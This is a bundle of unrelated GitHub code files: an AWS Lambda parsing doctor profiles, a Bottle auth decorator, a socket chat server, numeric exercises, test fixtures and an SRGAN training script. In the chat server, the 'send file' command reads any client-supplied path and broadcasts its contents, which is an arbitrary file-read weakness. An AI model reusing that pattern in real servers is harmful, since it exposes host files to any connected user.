'InvalidRequestException':\n # You provided a parameter value that is not valid for the current state of the resource.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'ResourceNotFoundException':\n # We can't find the resource that you asked for.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n else:\n # Decrypts secret using the associated KMS CMK.\n # Depending on whether the secret is a string or binary, one of these fields will be populated.\n if 'SecretString' in get_secret_value_response:\n secret = get_secret_value_response['SecretString']\n else:\n decoded_binary_secret = base64.b64decode(get_secret_value_response['SecretBinary'])\n return json.loads(secret)\n \n \ndef extract_practice_info(clinician_html, mcr):\n '''\n extract primary/secondary practice places\n '''\n profile = {}\n profile['mcr'] = mcr\n result = extract_texts(clinician_html)\n \n try:\n full_name = [r for r in result if mcr in r]\n profile['full_name'] = full_name[0][:-10]\n except:\n full_name = 'error'\n\n try:\n spec_patterns = [\n 'Specialty / Entry date into the Register of Specialists', \n 'Sub-Specialty / Entry date into the Register of Specialists'\n ]\n specialty = [result[i+1] for i, s in enumerate(result) if s in spec_patterns]\n specialty = specialty[0].strip()\n\n primary_hci = [result[i+4] for i, s in enumerate(result) if s=='Primary Place of Practice']\n profile['specialty'] = specialty\n profile['primary'] = primary_hci[0].strip()\n except:\n pass\n \n if 'Secondary Place of Practice' not in result:\n pass \n else:\n try:\n secondary_hcis = [result[i+4] for 
i, s in enumerate(result) if s=='Secondary Place of Practice']\n profile['secondary'] = [r.strip() for r in secondary_hcis]\n except:\n # raise Exception()\n pass\n return profile \n\ndef get_from_s3(mcr):\n s3 = boto3.client('s3')\n folder_prefix = datetime.today().strftime('%y%m%d')\n filename = f'{folder_prefix}/{mcr}.html'\n html_object = s3.get_object(Bucket='doctor-profiles', Key=filename)\n html_text = html_object['Body'].read().decode('utf-8')\n profile = extract_practice_info(html_text, mcr)\n return profile\n\n\ndef upload_elasticsearch(doc_profile, mcr):\n now = datetime.now()\n doc_profile['updated_datetime'] = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\n secret = get_secret()\n headers = {'Content-Type': 'application/json'}\n data = json.dumps(doc_profile)\n es_endpoint = 'https://search-mohdocs-2iniqjm32dbswnucm6tes3y4sm.ap-southeast-1.es.amazonaws.com/doctors/_doc/' \n document_index = es_endpoint + mcr + '_' + now.strftime('%y%m%d')\n response = requests.put(document_index, \n headers=headers, \n data=data, \n auth=(secret['opensearch_user'], secret['opensearch_pw']))\n return None\n\ndef lambda_handler(event, context):\n mcr = event['mcr']\n doc_profile = get_from_s3(mcr)\n upload_elasticsearch(doc_profile, mcr)\n return {\n 'statusCode': 200,\n 'body': f'Successfully added {mcr} to search engine!'\n }\n\n","repo_name":"mkitho/infoshelf","sub_path":"lambda_parse/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27228079474","text":"\"\"\"\nDefines the Authenticated Decorator which forces the user to be authenticated\nto perform the request.\n\"\"\"\n\nimport functools\n\nfrom bottle import request, redirect\nfrom helpers.config_manager import ConfigManager\n\n\ndef authenticated():\n \"\"\" Defines an authenticated decorator, which verifies that the user is\n logged in.\n\n When a function is associated with this decorator, if the function returns\n a dict this function will append a bool indicating whether or not the user\n is logged in.\n\n Args:\n None, but calls the user management interface to determine if the\n user is logged in.\n Returns:\n The dictionary the contained function returns, with an additional entry\n named 'logged_in' that maps to a boolean that indicates whether or not\n the user is logged in.\n\n If the contained function does not return a dict, then this function\n returns whatever the contained function returns.\n\n This function will also redirect the user to the login page if the user\n is not logged in.\n \"\"\"\n\n def decorator(function):\n\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n is_user_logged_in = ConfigManager.user_management_interface.is_user_logged_in(\n request)\n if not is_user_logged_in:\n redirect('/login_page')\n\n webpage_arguments = function(*args, **kwargs)\n\n api_key = ConfigManager.user_management_interface.get_api_key_for_user(\n request)\n if isinstance(webpage_arguments, dict):\n webpage_arguments['logged_in'] = is_user_logged_in\n webpage_arguments['api_key'] = api_key\n\n return webpage_arguments\n\n return wrapper\n\n return decorator\n","repo_name":"sumnerevans/wireless-debugging","sub_path":"server/helpers/authenticated.py","file_name":"authenticated.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"72616817174","text":"import socket\nimport 
threading\n\nHOST = socket.gethostbyname(socket.gethostname())\nPORT = 5566\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((HOST, PORT))\n\nserver.listen()\n\nclients = []\nnicknames = []\n\ndef broadcast(message):\n    for client in clients:\n        client.send(message)\n\n\ndef handle(client):\n    while True:\n        try:\n            message = client.recv(1024)\n            print(f\"{nicknames[clients.index(client)]} says {message}\")\n            if \"who is online?\" in message.decode(\"utf-8\"):\n                nicknames_joined = \",\".join(nicknames)\n                client.send(f'The clients connected are: {nicknames_joined}\\n'.encode('utf-8'))\n            elif \"send file\" in message.decode(\"utf-8\"):\n                path = message.decode(\"utf-8\").split(\"file \")[1]\n                path_len = len(path)\n                path = path[:path_len - 2] #To remove \"\\n\" at the end of the path\n                file = open(path, 'rb')\n                data = file.read(1024)\n                if data:\n                    print(\"Sending data\")\n                    broadcast(data)\n                    print(\"Data sent successfully\")\n                    break\n                else:\n                    print(\"failed to send data\")\n                    break\n            \n            elif \"to: \" in message.decode(\"utf-8\"):\n                text = message.decode(\"utf-8\").split(\"to: \")\n                actual_message = text[0].split(\":\")[1].strip()\n                receiver_nickname = text[1].strip()\n                sender_nickname = text[0].split(\":\")[0].strip()\n                receiver_index = nicknames.index(receiver_nickname)\n                client.send(f\"{sender_nickname} TO: ({receiver_nickname}) {actual_message}\\n\".encode('utf-8'))\n                receiver = clients[receiver_index]\n                receiver.send(f\"(PRIVATE) from {sender_nickname}: {actual_message}\\n\".encode('utf-8'))\n            else:\n                broadcast(message)\n        except:\n            index = clients.index(client)\n            clients.remove(client)\n            nickname = nicknames[index]\n            broadcast((f\"{nickname} left the conversation :/\\n\").encode('utf-8'))\n            client.close()\n            nicknames.remove(nickname)\n            broadcast(f\"{' '.join(nicknames)} online_users\".encode('utf-8')) #To send the updated list of online users and show it in the list box \n            if len(nicknames) == 0:\n                print(\"NO ONE IS CONNECTED :/\")\n            else:\n                print(f'The clients connected are: {nicknames}')\n            break\n\n\ndef receive():\n    while True:\n        client, address = server.accept()\n        print(f\"Connected with {str(address)}!\")\n        \n        client.send(\"NICK\".encode('utf-8'))\n        nickname = client.recv(1024).decode(\"utf-8\")\n        \n        nicknames.append(nickname)\n        clients.append(client)\n        \n        print(f\"Nickname of the client is {nickname}\")\n        broadcast(f\"{nickname} connected to the server!\\n\".encode('utf-8'))\n        broadcast(f\"{' '.join(nicknames)} online_users\".encode('utf-8')) #To send the list of online users and show it in the list box \n        client.send(\"Connected to the server\".encode('utf-8'))\n        thread = threading.Thread(target=handle, args=(client,)) #The comma just to make it a tuple\n        thread.start()\n    \n    \nprint(\"Server is running ...\")\nprint(\"Please <<<>>> use the following commands to enjoy the features of our mini chatter box:\\n\\n 1-to: (nickname) >>is to send a message privately \\n 2-who is online? 
>>is so you get the list of online clients on the server\\n 3-send file with the path wanted >>is to send a specific file\\n\")\nreceive()\n\n\n\n\n","repo_name":"daliaawad/Chatapp","sub_path":"Project1/Project-1-ChatProgram-prefinal-touches/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"43926432009","text":"def circular_prime(number):\n    primes = [True for i in range(0, number + 1)]\n    # sieve of Eratosthenes: mark multiples of every prime up to and including sqrt(number)\n    for i in range(2, int(number ** 0.5) + 1):\n        if primes[i]:\n            for j in range(i ** 2, number + 1, i):\n                primes[j] = False\n    result = []\n    for i in range(0, number + 1):\n        if primes[i]:\n            length = len(str(i))\n            for j in range(length):\n                if not primes[int(str(i)[-j:] + str(i)[:-j])]:\n                    break\n            else:\n                result.append(i)\n    return len(result)\n\n\nif __name__ == '__main__':\n    print(circular_prime(1000000))\n","repo_name":"Saterton/softheme","sub_path":"circular_prime.py","file_name":"circular_prime.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"3216730663","text":"\nimport random\nimport numpy as np\nimport math\nM=1500\nN=128-63\nK=96*3-49\nn=2\nsp_dtype=np.dtype([('row',np.int32),('col',np.int32),('val',np.float)])\nclass DDR:\n    mat1=np.empty((M,N),dtype=sp_dtype).tolist()\n    mat2=np.empty((N,K),dtype=np.float).tolist()\n    ## divided into N/32 blocks, each block of size M*32\n    mat1sparse=np.empty((math.ceil(M/1024),math.ceil(N/32)),dtype=sp_dtype).tolist()\n    def __init__(self):\n        ## init mat1 with sparsity\n        for i in range(M):\n            for j in range(N):\n                self.mat1[i][j]=(i,j,random.randint(0,10)*random.choice([0,0,0,0,0,0,0,1]))\n        for i in range(N):\n            for j in range(K):\n                self.mat2[i][j]=random.randint(1,10)\n        for i in range(M):\n            for j in range(N):\n                if self.mat1[i][j][2]!=0:\n                    if(isinstance(self.mat1sparse[int(i/1024)][int(j/ 32)],tuple)):\n                        self.mat1sparse[int(i/1024)][int(j/ 32)]=[self.mat1[i][j]]\n                    else:\n                        self.mat1sparse[int(i/1024)][int(j/32)].append(self.mat1[i][j])\n    def show_mat1(self):\n        for i in range(math.ceil(M/1024)):\n            for j in range(math.ceil(N/32)):\n                print(\"number of vals in (%d,%d) M*32 mat1 block is %d\"%(i,j,len(self.mat1sparse[i][j])))\n    def get_mat1_blocks_by_group(self,group_number,index_of_block_count_by_by_row):\n        # mat1sparse layout is (N/32)*(M*32); each call returns a group of size n*(M*32), group_number is 0, 1, ...\n        return self.mat1sparse[index_of_block_count_by_by_row][group_number*n:(group_number+1)*n]\n    def get_mat2_blocks(self,addr,block_size=32*n,block_bumber=96):\n        # each call returns 96 blocks, each block is 32n\n        row_addr=int(addr/K)\n        col_addr=addr-row_addr*K\n        return np.array(self.mat2)[row_addr:row_addr+block_size,col_addr:col_addr+block_bumber].tolist()\n\n    def get_correct_result(self):\n        a=np.zeros((M,N))\n        for i in range(M):\n            for j in range(N):\n                a[i][j]=self.mat1[i][j][2]\n\n        b=np.array(self.mat2)\n        return np.matmul(a,b).tolist()\n\n\n\n\nclass MatRAM:\n    data=[]\n    def store_mat1_blocks_by_group(self,spmat_group):\n        for i in spmat_group:\n            self.data.append(i)\n    def get_32_nozero_elements(self,addr,block_index):\n        ## MatRAM data layout is (N/32)*(M*32)\n        return self.data[block_index][addr:addr+32]\n\n\n    def del_mat1_blocks_by_group(self):\n        self.data.clear()\n    def show_mat1(self):\n        print(\"number of M*32 mat1 blocks is %d\" % (len(self.data)))\n        for i in self.data:\n            print(\"number of vals in this M*32 mat1 block is %d\"%(len(i)))\n\n    def 
get_number_of_vals_in_one_block(self,block_index):\n if(block_index0):\n for i in range(padding_row_size):\n self.data.append([0 for j in range(len(vec_blocks[0]))])\n\n def get_data(self):\n return self.data\n\n def clear_vec_ram(self):\n self.data.clear()\n def show(self):\n print(\"the vec ram size si %d*%d\"%(len(self.data),len(self.data[0])))\nclass VecRegs:\n ### data layout 12*8*(32*n)\n cu_list=[[] for i in range(12)]\n def store_vec_regs(self, vec_blocks):\n vec_blocks=np.array(vec_blocks)\n for i in range(12):\n # vec_blocks layout (32*n)*96\n ## need reshape from (32*n)*8 8*(32*n)\n ## most of the time block_numbers=96\n block_numbers=len(vec_blocks[0])\n self.cu_list[i] = vec_blocks[:, i:i + block_numbers:12].transpose().tolist()\n max_12_in_blocks =0\n for i in range(12):\n if(len(self.cu_list[i])>max_12_in_blocks):\n max_12_in_blocks=len(self.cu_list[i])\n ## number_of_32_in_blocks is 96 except for the last block\n number_of_32_in_blocks=len(vec_blocks)\n\n for i in range(12):\n if(len(self.cu_list[i]) self.max_row_index):\n for j in range(i[0]-self.max_row_index):\n self.CU_src1_dense.append([0 for j in range(32)])\n self.number_of_rows+=1\n self.max_row_index=i[0]\n self.CU_src1_dense[-1][i[1] % 32] = i[2]\n else:\n ##row 1024 to 0\n pass\n def CUs_compute(self,coladdr):\n temp1=np.array(self.CU_src1_dense)\n temp2 = np.array(self.CU_src2)\n for i in range(len(self.CU_src1_dense)):\n for j in range(12):\n ## COMPUTE THE PADDING PART BUT NOT ADD\n if (coladdr+j bool:\n stt = {'a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'} \n \n n = len(s)\n cnt = 0\n for i in range(n//2):\n if s[i] in stt: cnt+=1\n if s[n-1-i] in stt: cnt-=1\n \n if cnt ==0: return True\n return False\n","repo_name":"samek571/leetcode-600","sub_path":"1704. Determine if String Halves Are Alike.py","file_name":"1704. 
Determine if String Halves Are Alike.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6817704476","text":"import pandas as pd\nfrom models.product_data import BrandData\nfrom shopify_dao.product import ProductDao\nfrom supplier_manager.andersonteak.product_manager import AndersonTeakProductManager\nfrom tests.supplier_manager.assertions import assert_base_data, assert_sku_fetch\n\n\ndef test_convert_anderson_product(product_dao: ProductDao, brand_data: BrandData):\n atpm = AndersonTeakProductManager(\n product_dao,\n brand_data,\n 'datacollections/andersonteak/testproducts.xlsx', \n 'datacollections/andersonteak/testinventory.csv',\n sku_prefix=\"TEST\"\n )\n atpm.upsert_all_anderson_data()\n product_data_list = atpm.fetch_all_product_data_list()\n assert len(product_data_list) > 0\n assert_base_data(product_data_list, product_dao)\n\n\ndef test_fetch_single_row(product_dao: ProductDao, brand_data: BrandData):\n product_path = 'datacollections/andersonteak/testproducts.xlsx'\n xls = pd.ExcelFile(product_path)\n product_df: pd.DataFrame = pd.read_excel(xls, 'Bulkload', header=1).dropna(subset=['Product Name']).reset_index(drop=True)\n sku_prefix = \"TEST\"\n atpm = AndersonTeakProductManager(\n product_dao,\n brand_data,\n product_path, \n 'datacollections/andersonteak/testinventory.csv',\n sku_prefix=sku_prefix\n )\n sku = list(product_df['Manufacturer Model Number'])[0]\n default_id = f\"{sku_prefix}-{sku}\"\n assert_sku_fetch(atpm, default_id)\n\n","repo_name":"todhm/expertodeleste","sub_path":"backend/tests/supplier_manager/test_anderson_teak.py","file_name":"test_anderson_teak.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32194284764","text":"test_dict = {\r\n\r\n}\r\ntest_dict[\"中直机关2018年4季度批量集中采购项目招标公告2018年08月29日 11:29 来源:中国政府采购网 【打印】\"] = \"123\"\r\n\r\n# print(test_dict)\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nres = requests.get(\"http://www.ccgp.gov.cn/cggg/dfgg/xjgg/201903/t20190307_11724686.htm\")\r\nres.encoding = res.apparent_encoding\r\n\r\nsoup = BeautifulSoup(res.text,\"html.parser\")\r\n\r\n\r\n# count = 0\r\n# list = []\r\n\r\n# l = list[1]\r\ntrs = soup.select(\".vF_detail_content\")\r\nfor tr in trs:\r\n print(type(tr.text))\r\n # tds = tr.select(\"td\")\r\n # for td in tds:\r\n # print(td.text)\r\n # print(\"-----------------------\")","repo_name":"KqSMea8/pyhton","sub_path":"tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17997610784","text":"import numpy as np\n\nA2 = np.array([[1, 2, 2],\n [2, 1, 1],\n [1, 2, 1]])\nA3p = np.random.rand(90, 90)\nA3 = A3p*A3p + 0.0000001 * np.eye(90)\nA4 = np.array([[1, 2],\n [2, 8]])\nA5 = np.array([[2020]])\n\ntest_inv1 = [np.eye(2020), np.eye(2020)]\ntest_inv2 = [A2, np.linalg.inv(A2)]\ntest_inv3 = [A3, np.linalg.inv(A3)]\ntest_inv4 = [A4, np.linalg.inv(A4)]\ntest_inv5 = [A5, np.linalg.inv(A5)]\n\nTESTS_INV = [\n test_inv1, test_inv2, test_inv3, test_inv4, test_inv5\n]\n##################################################\ne1 = np.zeros(2020)\ne1[0] = 1\ntest1_gauss = [[np.eye(2020), e1], e1.transpose()]\nvec2 = np.array([[1], [2], [4]])\nA2inv = np.linalg.inv(A2)\ntest2_gauss = [[A2, vec2], A2inv.dot(vec2)]\nvec3 = np.random.rand(90, 1)\nA3inv = 
np.linalg.inv(A3)\ntest3_gauss = [[A3, vec3], A3inv.dot(vec3)]\nA4inv = np.linalg.inv(A4)\nvec4 = np.array([[3], [9]])\ntest4_gauss = [[A4, vec4], A4inv.dot(vec4)]\ntest5_gauss = [[A5, np.array([[1], [1], [1]])], np.array([[1/2020], [1/2020], [1/2020]])]\n\nTESTS_GAUSS_FORM = [\n    test1_gauss, test2_gauss, test3_gauss, test4_gauss, test5_gauss\n]\n#########################################\n\n\ndef StepEuler(t, x, h, func):\n    \"\"\" Function returning the approximation of the integral of f at time t+h \"\"\"\n    return x + h * func(t, x)\n\n\ndef MyEuler(t0, x0, T, N, func):\n    \"\"\" Function returning the approximation of the integral of f over the interval t0 - t0+T \"\"\"\n    x = np.zeros(N + 1, dtype='float')\n    x[0] = x0  # Set the initial value x0\n\n    h = T / N\n    time = np.linspace(t0, t0 + T, N + 1, dtype='float')  # Define the time steps\n\n    # Compute x(t) for every t using StepEuler\n    for idx in range(N):\n        x[idx + 1] = StepEuler(time[idx], x[idx], h, func)\n\n    return time, x\n\n\ndef func1(t, x):\n    return np.cosh(x ** 2 * t) + 50 * np.tanh(t / (np.abs(x) + 1))\n\n\ndef func2(t, x):\n    return np.exp(x+2*t)\n\n\ndef func3(t, x):\n    return x ** t - t ** x\n\n\ndef func4(t, x):\n    return t ** 2 - x ** 2\n\n\ndef func5(t, x):\n    return np.ceil(t - x) - (t - x)\n\n\ntest_euler1 = [[0, 1, 0.01, 100, func1], MyEuler(0, 1, 0.01, 100, func1)]\ntest_euler2 = [[0.1, 0, 0.1, 10, func2], MyEuler(0.1, 0, 0.1, 10, func2)]\ntest_euler3 = [[1, 3, 0.001, 42, func3], MyEuler(1, 3, 0.001, 42, func3)]\ntest_euler4 = [[0, 0, 0.0001, 2000, func4], MyEuler(0, 0, 0.0001, 2000, func4)]\ntest_euler5 = [[1, 0, 1, 9310023, func5], MyEuler(1, 0, 1, 9310023, func5)]\n\nTESTS_EULER = [test_euler1, test_euler2, test_euler3, test_euler4, test_euler5]\n\n#####################################\n\n\ndef f(t, x):\n    return np.sin(t**2)\n\n\ndef progtir(b):\n    # Find a numerical solution to the equation y''=fy, simplified as two ODEs of order 1.\n    # The number of iterations and the Cauchy conditions are hard-coded.\n    y = np.zeros(1000001, dtype='float')  # y[t]\n    z = np.zeros(1000001, dtype='float')  # y'[t]\n    y[0] = 1  # y[0]\n    z[0] = b  # y'[0]\n    h = 5 / 1000000\n    time = np.linspace(0, 5, 1000000, dtype='float')  # Define the time steps\n\n    # Compute y(t) and y'(t) for every t using the system derived from y''=f*y\n    for idx in range(1000000):\n        z[idx + 1] = z[idx] + h * f(time[idx], y[idx]) * y[idx]\n        y[idx + 1] = y[idx] + h * z[idx]\n\n    return y[1000000]\n\n\ndef methtir(eps):\n    # A bisection method finding a value b for which progtir(b) = 0 on [-1, 0] with error eps.\n    # The iteration limit and initial constants are hard-coded.\n    left_b = -1\n    right_b = 0\n    iteration = 0\n    curr_val = 0\n\n    while iteration < 100000:\n        avg = (left_b + right_b) / 2\n        curr_val = progtir(avg)\n        if (right_b - left_b < eps) or curr_val == 0:\n            break\n\n        iteration += 1\n        if curr_val * progtir(left_b) > 0:\n            left_b = avg\n        else:\n            right_b = avg\n\n    return curr_val\n\n\nrandom_epsilons = np.random.rand(1, 15)\nrandom_ints = np.random.randint(-20212021, 20212021, 15)\nTESTS_PROGTIR = [[float(b), float(progtir(b))] for b in random_ints]\nTESTS_METHTIR = [[float(eps), float(methtir(eps))] for eps in random_epsilons[0]]\n","repo_name":"schwartznir/grader_iut","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"32213929912","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.dashboard, name=\"dashboard\"),\n path('month_selector/', views.month_selector, name=\"month_selector\"),\n \n path('bank_detail/', views.bank_detail, name=\"bank_detail\"),\n path('bank/create', views.create_bank_account, name=\"create_bank_account\"),\n path('bank/update/', views.update_bank_account, name=\"update_bank_account\"),\n path('bank/remove/', views.remove_bank_ac, name=\"remove_bank_ac\"),\n]\n","repo_name":"miketqqq/Account-Manager","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23698603103","text":"import os\r\nimport argparse\r\nfrom models import *\r\nfrom datasets import *\r\nfrom tools.tools import Timer, AverageMeter, tdict\r\nimport socket\r\nfrom utils import *\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.distributed as dist\r\nimport torch.multiprocessing as mp\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nfrom torchvision.utils import save_image, make_grid\r\nfrom apex import amp\r\nfrom apex.parallel import DistributedDataParallel as DDP\r\n\r\ndef main():\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--n_epochs\", type=int, default=10)\r\n parser.add_argument(\"--dataset_name\", type=str, default=\"img_align_celeba\")\r\n parser.add_argument(\"--batch_size\", type=int, default=4)\r\n parser.add_argument(\"--lr\", type=float, default=0.0002)\r\n parser.add_argument(\"--b1\", type=float, default=0.5)\r\n parser.add_argument(\"--b2\", type=float, default=0.999)\r\n parser.add_argument(\"--n_cpu\", type=int, default=8)\r\n parser.add_argument(\"--hr_height\", type=int, default=256)\r\n parser.add_argument(\"--hr_width\", type=int, default=256)\r\n parser.add_argument(\"--channels\", type=int, default=3)\r\n parser.add_argument(\"--validation_interval\", type=int, default=100)\r\n parser.add_argument(\"--checkpoint_name\", type=str, default='parallel')\r\n\r\n parser.add_argument('-n', '--nodes', default=1, type=int)\r\n parser.add_argument('-g', '--gpus', default=1, type=int)\r\n parser.add_argument('-nr', '--nr', default=0, type=int)\r\n parser.add_argument('--master_addr', default=str(socket.gethostbyname(socket.gethostname())), type=str, help='master ip address')\r\n parser.add_argument('--master_port', default='8888', type=str, help='master port')\r\n args = parser.parse_args()\r\n\r\n args.world_size = args.gpus * args.nodes\r\n os.environ['MASTER_ADDR'] = args.master_addr\r\n os.environ['MASTER_PORT'] = '20000'\r\n print(args)\r\n mp.spawn(train, nprocs=args.gpus, args=(args,))\r\n\r\ndef train(gpu, args):\r\n rank = args.nr * args.gpus + gpu\r\n dist.init_process_group(backend='nccl', init_method='env://', world_size=args.world_size, rank=rank)\r\n torch.manual_seed(0)\r\n\r\n hr_shape = (args.hr_height, args.hr_width)\r\n generator = GeneratorResNet()\r\n discriminator = Discriminator(input_shape=(args.channels, *hr_shape))\r\n feature_extractor = FeatureExtractor()\r\n\r\n torch.cuda.set_device(gpu)\r\n generator.cuda(gpu)\r\n discriminator.cuda(gpu)\r\n feature_extractor.cuda(gpu)\r\n\r\n # loss\r\n criterion_GAN = nn.MSELoss().cuda(gpu)\r\n criterion_content = nn.L1Loss().cuda(gpu)\r\n\r\n # optimizer\r\n optimizer_G = torch.optim.Adam(generator.parameters(), lr=args.lr, betas=(args.b1, args.b2))\r\n optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=args.lr, betas=(args.b1, 
args.b2))\r\n\r\n # Save model attributes (erased after DDP)\r\n discriminator_output_shape = discriminator.output_shape\r\n\r\n # Wrap the model\r\n generator = nn.parallel.DistributedDataParallel(generator, device_ids=[gpu])\r\n discriminator = nn.parallel.DistributedDataParallel(discriminator, device_ids=[gpu], broadcast_buffers=False)\r\n feature_extractor = nn.parallel.DistributedDataParallel(feature_extractor, device_ids=[gpu])\r\n\r\n # Dataloader\r\n train_dataset = ImageDataset(\"../../data/%s\" % args.dataset_name, hr_shape=hr_shape)\r\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset,\r\n num_replicas=args.world_size,\r\n rank=rank)\r\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\r\n batch_size=args.batch_size,\r\n shuffle=False,\r\n num_workers=0,\r\n pin_memory=True,\r\n sampler=train_sampler)\r\n\r\n torch.autograd.set_detect_anomaly(True)\r\n total_step = len(train_loader)\r\n\r\n if gpu == 0 :\r\n os.makedirs(\"images\", exist_ok=True)\r\n os.makedirs(\"saved_models\", exist_ok=True)\r\n\r\n global_timer = Timer()\r\n epoch_timer = Timer()\r\n iter_timer = Timer()\r\n iter_time_meter = AverageMeter()\r\n\r\n global_timer.start()\r\n\r\n for epoch in range(args.n_epochs):\r\n if gpu == 0:\r\n epoch_timer.start()\r\n for i, imgs in enumerate(train_loader):\r\n if gpu == 0:\r\n iter_timer.start()\r\n imgs_lr = imgs[\"lr\"].cuda(non_blocking=True)\r\n imgs_hr = imgs[\"hr\"].cuda(non_blocking=True)\r\n\r\n valid = torch.ones((imgs_lr.size(0), *discriminator_output_shape), device=gpu)\r\n fake = torch.zeros((imgs_lr.size(0), *discriminator_output_shape), device=gpu)\r\n\r\n gen_hr = generator(imgs_lr)\r\n\r\n loss_GAN = criterion_GAN(discriminator(gen_hr), valid)\r\n\r\n gen_features = feature_extractor(gen_hr)\r\n real_features = feature_extractor(imgs_hr)\r\n loss_content = criterion_content(gen_features, real_features.detach())\r\n\r\n # Total loss\r\n loss_G = loss_content + 1e-3 * loss_GAN\r\n\r\n optimizer_G.zero_grad()\r\n loss_G.backward()\r\n optimizer_G.step()\r\n\r\n loss_real = criterion_GAN(discriminator(imgs_hr), valid)\r\n loss_fake = criterion_GAN(discriminator(gen_hr.detach()), fake)\r\n\r\n loss_D = (loss_real + loss_fake) / 2\r\n\r\n optimizer_D.zero_grad()\r\n loss_D.backward()\r\n optimizer_D.step()\r\n\r\n if gpu == 0:\r\n print(\r\n \"[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f] \"\r\n % (epoch, args.n_epochs, i, len(train_loader), loss_D.item(), loss_G.item()), end=''\r\n )\r\n iter_time_meter.update(iter_timer.stop())\r\n print('time for iteration: %.4f (%.4f)'%(iter_time_meter.val, iter_time_meter.avg))\r\n\r\n if i % args.validation_interval == 0:\r\n imgs_lr = nn.functional.interpolate(imgs_lr, scale_factor=4)\r\n imgs_hr_raw = imgs['hr_raw'].cuda(non_blocking=True)\r\n with torch.no_grad():\r\n print('[psnr] (imgs_lr):%.4f, (gen_hr):%.4f'%(psnr(minmaxscaler(imgs_lr), imgs_hr_raw, max_val=1).mean().item(), psnr(minmaxscaler(gen_hr), imgs_hr_raw, max_val=1).mean().item()))\r\n\r\n imgs_hr_raw = make_grid(imgs_hr_raw, nrow=1, normalize=True)\r\n gen_hr = make_grid(gen_hr, nrow=1, normalize=True)\r\n imgs_lr = make_grid(imgs_lr, nrow=1, normalize=True)\r\n img_grid = torch.cat((imgs_hr_raw, imgs_lr, gen_hr), -1)\r\n save_image(img_grid, \"images/%d.png\" % i, normalize=False)\r\n if gpu==0:\r\n print('Elapsed_time for epoch(%s): %s'%(epoch, epoch_timer.stop()))\r\n if gpu == 0:\r\n print(\"Training complete in: %s \"%global_timer.stop())\r\n print('Average time per iteration: 
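The training loop combines a perceptual term with a small adversarial term for the generator (`loss_G = loss_content + 1e-3 * loss_GAN`) and averages real/fake MSE terms for the discriminator. Here is a self-contained sketch of just that loss arithmetic on dummy tensors, assuming only that PyTorch is installed; every tensor below is a placeholder for the corresponding network output:

```python
import torch
import torch.nn as nn

criterion = nn.MSELoss()
d_real = torch.rand(4, 1)        # stand-in for discriminator(imgs_hr)
d_fake = torch.rand(4, 1)        # stand-in for discriminator(gen_hr)
valid = torch.ones_like(d_real)  # "real" targets
fake = torch.zeros_like(d_fake)  # "fake" targets

loss_content = torch.rand(1)     # stand-in for the feature-space L1 term
loss_G = loss_content + 1e-3 * criterion(d_fake, valid)
loss_D = (criterion(d_real, valid) + criterion(d_fake, fake)) / 2
print(loss_G.item(), loss_D.item())
```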
%s'%str(iter_time_meter.avg))\r\n torch.save(generator.state_dict(), \"saved_models/generator_%s.pth\" % args.checkpoint_name)\r\n torch.save(discriminator.state_dict(), \"saved_models/discriminator_%s.pth\" % args.checkpoint_name)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n'''\r\n PSNR SSIM\r\n generator 23.4061 0.7882\r\n low res 26.2965 0.7801\r\n\r\ntimer per iteration: 1.2152\r\n'''\r\n","repo_name":"jsyoo61/MultiGPU-SRGAN","sub_path":"srgan_distributed.py","file_name":"srgan_distributed.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"33237291918","text":"import os\n\nwith open('dbgAc97.h', 'r') as f:\n\tac97File = f.read()\nwith open('dbgLog.h', 'r') as f:\n\tdbgLog = f.read()\nwith open('..\\common.h') as f:\n\tcommon = f.read();\n\t\npath = os.path.abspath(os.getcwd()+'/../../bin/dbgLog.bin')\n\ndbgLog = dbgLog.replace('%LOGFILE%', path.replace('\\\\', '\\\\\\\\'))\ndbgLog = dbgLog.replace('#include \"../common.h\"', common)\nac97File = ac97File.replace('#include \"dbgLog.h\"', dbgLog)\n\nwith open('../../bin/dbgAc97.h', 'w') as 